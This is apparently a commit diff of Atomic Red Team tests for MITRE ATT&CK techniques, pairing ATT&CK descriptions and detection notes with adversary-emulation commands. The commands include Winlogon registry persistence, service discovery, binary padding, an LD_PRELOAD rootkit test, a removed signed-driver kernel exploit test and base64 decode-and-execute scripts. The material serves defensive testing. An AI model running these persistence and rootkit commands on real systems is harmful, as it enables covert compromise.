Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
- name: Winlogon Notify Key Logon Persistence - PowerShell
description: |
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of notification package to execute
type: Path
default: C:\Windows\Temp\atomicNotificationPackage.dll
executor:
name: powershell
command: |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
atomics/T1007/T1007.md
+11 -21
View File
@@ -1,13 +1,21 @@
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.</blockquote>
<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Windows
Data Sources: Process command-line parameters, Process monitoring
Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Tests
- [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)
- [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe)
<br/>
@@ -32,21 +40,3 @@ sc stop #{service_name}
wmic service where (displayname like "#{service_name}") get name
```
<br/>
<br/>
## Atomic Test #2 - System Service Discovery - net.exe
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
#### Run it with `command_prompt`!
```
net.exe start >> #{output_file}
```
<br/>
atomics/T1007/T1007.yaml
-15
View File
@@ -25,18 +25,3 @@ atomic_tests:
sc start #{service_name}
sc stop #{service_name}
wmic service where (displayname like "#{service_name}") get name
- name: System Service Discovery - net.exe
description: |
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path of file to hold net.exe output
type: Path
default: C:\Windows\Temp\service-list.txt
executor:
name: command_prompt
command: |
net.exe start >> #{output_file}
atomics/T1009/T1009.md
-27
View File
@@ -1,27 +0,0 @@
# T1009 - Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
<blockquote>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
<br/>
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
Uses dd to add a zero to the binary to change the hash
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
#### Run it with `sh`!
```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
<br/>
atomics/T1009/T1009.yaml
-21
View File
@@ -1,21 +0,0 @@
---
attack_technique: T1009
display_name: Binary Padding
atomic_tests:
- name: Pad Binary to Change Hash - Linux/macOS dd
description: |
Uses dd to add a zero to the binary to change the hash
supported_platforms:
- macos
- linux
input_arguments:
file_to_pad:
description: Path of binary to be padded
type: Path
default: /tmp/evil-binary
executor:
name: sh
command: |
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
atomics/T1010/T1010.md
-31
View File
@@ -1,31 +0,0 @@
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</blockquote>
## Atomic Tests
- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
<br/>
## Atomic Test #1 - List Process Main Windows - C# .NET
Compiles and executes C# code to list main window titles associated with each process.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
#### Run it with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
<br/>
atomics/T1010/T1010.yaml
-27
View File
@@ -1,27 +0,0 @@
---
attack_technique: T1010
display_name: Application Window Discovery
atomic_tests:
- name: List Process Main Windows - C# .NET
description: |
Compiles and executes C# code to list main window titles associated with each process.
supported_platforms:
- windows
input_arguments:
input_source_code:
description: Path to source of C# code
type: path
default: C:\AtomicRedTeam\atomics\T1010\src\T1010.cs
output_file_name:
description: Name of output binary
type: string
default: T1010.exe
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
atomics/T1010/src/T1010.cs
-44
View File
@@ -1,44 +0,0 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
/*
Author: Tony Lambert, Twitter: @ForensicITGuy
License: MIT License
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe T1010.cs
Step Two:
T1010.exe
*/
namespace WindowLister
{
class Lister
{
static List<string> ListMainWindowTitles()
{
List<string> windowTitlesList = new List<string>();
Process[] processlist = Process.GetProcesses();
foreach (Process process in processlist)
{
string titleOutputLine;
if (!String.IsNullOrEmpty(process.MainWindowTitle))
{
titleOutputLine = "Process: " + process.ProcessName + " ID: " + process.Id + " Main Window title: " + process.MainWindowTitle;
windowTitlesList.Add(titleOutputLine);
}
}
return windowTitlesList;
}
static void Main(string[] args)
{
List<string> windowTitlesList = ListMainWindowTitles();
windowTitlesList.ForEach(i => Console.Write("{0}\n", i));
}
}
}
atomics/T1012/T1012.md
+11 -1
View File
@@ -2,7 +2,17 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
<blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.</blockquote>
The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Interaction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Windows
Data Sources: Windows Registry, Process monitoring, Process command-line parameters
Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Tests
atomics/T1014/T1014.md
+18 -20
View File
@@ -1,8 +1,18 @@
# T1014 - Rootkit
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
<blockquote>Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)
<blockquote>Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware. (Citation: Wikipedia Rootkit)
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
Detection: Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)
Platforms: Linux, macOS, Windows
Data Sources: BIOS, MBR, System calls
Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems, Process whitelisting, Signature-based detection, System access controls, Whitelisting by file name or path
Permissions Required: Administrator, SYSTEM, root</blockquote>
## Atomic Tests
@@ -10,7 +20,7 @@ Adversaries may use rootkits to hide the presence of programs, files, network co
- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)
- [Atomic Test #3 - LD_PRELOAD based Rootkit](#atomic-test-3---ld_preload-based-rootkit)
<br/>
@@ -51,26 +61,14 @@ sudo modprobe #{rootkit_file}
<br/>
<br/>
## Atomic Test #3 - Windows Signed Driver Rootkit Test
This test exploits a signed driver to execute code in Kernel.
SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
We leverage the work done here:
https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
The hash of our PoC Exploit is
SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
This will simulate hiding a process.
It would be wise if you only run this in a test environment
## Atomic Test #3 - LD_PRELOAD based Rootkit
LD_PRELOAD based Rootkit
**Supported Platforms:** Windows
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
#### Run it with `command_prompt`!
#### Run it with `sh`!
```
puppetstrings #{driver_path}
export LD_PRELOAD=$PWD/#{rootkit_file}
```
<br/>
atomics/T1014/T1014.yaml
+5 -19
View File
@@ -37,28 +37,14 @@ atomic_tests:
name: sh
command: |
sudo modprobe #{rootkit_file}
- name: Windows Signed Driver Rootkit Test
- name: LD_PRELOAD based Rootkit
description: |
This test exploits a signed driver to execute code in Kernel.
SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
We leverage the work done here:
https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
The hash of our PoC Exploit is
SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
This will simulate hiding a process.
It would be wise if you only run this in a test environment
LD_PRELOAD based Rootkit
supported_platforms:
- windows
- linux
input_arguments:
driver_path:
description: Path to the vulnerable driver
type: Path
default: C:\Drivers\driver.sys
executor:
name: command_prompt
name: sh
command: |
puppetstrings #{driver_path}
export LD_PRELOAD=$PWD/#{rootkit_file}
atomics/T1014/bin/puppetstrings.exe
BIN
View File
Binary file not shown.
atomics/T1015/T1015.md
+18 -6
View File
@@ -6,17 +6,29 @@ Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>
Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code></blockquote>
*On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
*Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
*Narrator: <code>C:\Windows\System32\Narrator.exe</code>
*Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
*App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>
Detection: Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</code>.
Platforms: Windows
Data Sources: Windows Registry, File monitoring, Process monitoring
Effective Permissions: SYSTEM
Permissions Required: Administrator
Contributors: Paul Speulstra, AECOM Global Security Operations Center</blockquote>
## Atomic Tests
atomics/T1016/T1016.md
+11 -1
View File
@@ -1,6 +1,16 @@
# T1016 - System Network Configuration Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016)
<blockquote>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).</blockquote>
<blockquote>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: Process command-line parameters, Process monitoring
Permissions Required: User</blockquote>
## Atomic Tests
atomics/T1018/T1018.md
+15 -5
View File
@@ -2,17 +2,27 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
### Windows
===Windows===
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039).
Examples of tools and commands that acquire this information include "ping" or "net view" using Net.
### Mac
===Mac===
Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.
### Linux
===Linux===
Utilities such as "ping" and others can be used to gather information about remote systems.</blockquote>
Utilities such as "ping" and others can be used to gather information about remote systems.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Tests
atomics/T1022/T1022.md
+14 -2
View File
@@ -2,7 +2,19 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1022)
<blockquote>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</blockquote>
Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol
Detection: Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
Requires Network: No</blockquote>
## Atomic Tests
@@ -12,7 +24,7 @@ Other exfiltration techniques likely apply as well to transfer the information o
<br/>
## Atomic Test #1 - Data Encrypted
Encrypt data for exiltration
TODO
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
atomics/T1022/T1022.yaml
+1 -1
View File
@@ -5,7 +5,7 @@ display_name: Data Encrypted
atomic_tests:
- name: Data Encrypted
description: |
Encrypt data for exiltration
TODO
supported_platforms:
- macos
atomics/T1027/T1027.md
-33
View File
@@ -1,33 +0,0 @@
# T1027 - Obfuscated Files or Information
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027)
<blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Decode base64 Data into Script](#atomic-test-1---decode-base64-data-into-script)
<br/>
## Atomic Test #1 - Decode base64 Data into Script
Creates a base64-encoded data file and decodes it into an executable shell script
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
```
<br/>
atomics/T1027/T1027.yaml
-20
View File
@@ -1,20 +0,0 @@
---
attack_technique: T1027
display_name: Obfuscated Files or Information
atomic_tests:
- name: Decode base64 Data into Script
description: |
Creates a base64-encoded data file and decodes it into an executable shell script
supported_platforms:
- macos
- linux
executor:
name: sh
command: |
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
atomics/T1028/T1028.md
+14 -2
View File
@@ -1,6 +1,18 @@
# T1028 - Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</blockquote>
<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)
Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.
Platforms: Windows
Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator
System Requirements: WinRM listener turned on and configured on remote system
Remote Support: Yes</blockquote>
## Atomic Tests
@@ -25,7 +37,7 @@ Powershell Enable WinRM
#### Run it with `powershell`!
```
Enable-PSRemoting -Force
powershell Enable-PSRemoting -Force
```
<br/>
<br/>
atomics/T1028/T1028.yaml
+1 -1
View File
@@ -13,7 +13,7 @@ atomic_tests:
executor:
name: powershell
command: |
Enable-PSRemoting -Force
powershell Enable-PSRemoting -Force
- name: PowerShell Lateral Movement
description: |
atomics/T1030/T1030.md
+14 -1
View File
@@ -1,6 +1,14 @@
# T1030 - Data Transfer Size Limits
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>
<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Platforms: Linux, macOS, Windows
Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring
Requires Network: Yes</blockquote>
## Atomic Tests
@@ -15,6 +23,11 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | TODO | todo | TODO|
#### Run it with `sh`!
```
cd /tmp/
atomics/T1030/T1030.yaml
+6
View File
@@ -13,6 +13,12 @@ atomic_tests:
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
executor:
name: sh
command: |
atomics/T1031/T1031.md
+19 -3
View File
@@ -1,10 +1,26 @@
# T1031 - Modify Existing Service
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1031)
<blockquote>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).
<blockquote>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)</blockquote>
Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)
Detection: Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns)
Service information is stored in the Registry at <code>HKLM\SYSTEM\CurrentControlSet\Services</code>.
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute cmd commands or scripts.
Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
Platforms: Windows
Data Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring
Permissions Required: Administrator, SYSTEM
Contributors: Travis Smith, Tripwire, Matthew Demaske, Adaptforward</blockquote>
## Atomic Tests
atomics/T1033/T1033.md
+16 -6
View File
@@ -1,16 +1,26 @@
# T1033 - System Owner/User Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033)
<blockquote>### Windows
<blockquote>===Windows===
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.
### Mac
===Mac===
On Mac, the currently logged in user can be identified with <code>users</code>,<code>w</code>, and <code>who</code>.
### Linux
===Linux===
On Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.</blockquote>
On Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Process monitoring, Process command-line parameters
Permissions Required: User, Administrator</blockquote>
## Atomic Tests
@@ -30,7 +40,7 @@ Identify System owner or users on an endpoint
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | computer1|
| computer_name | Name of remote computer | strong | computer1|
#### Run it with `command_prompt`!
```
atomics/T1033/T1033.yaml
+1 -2
View File
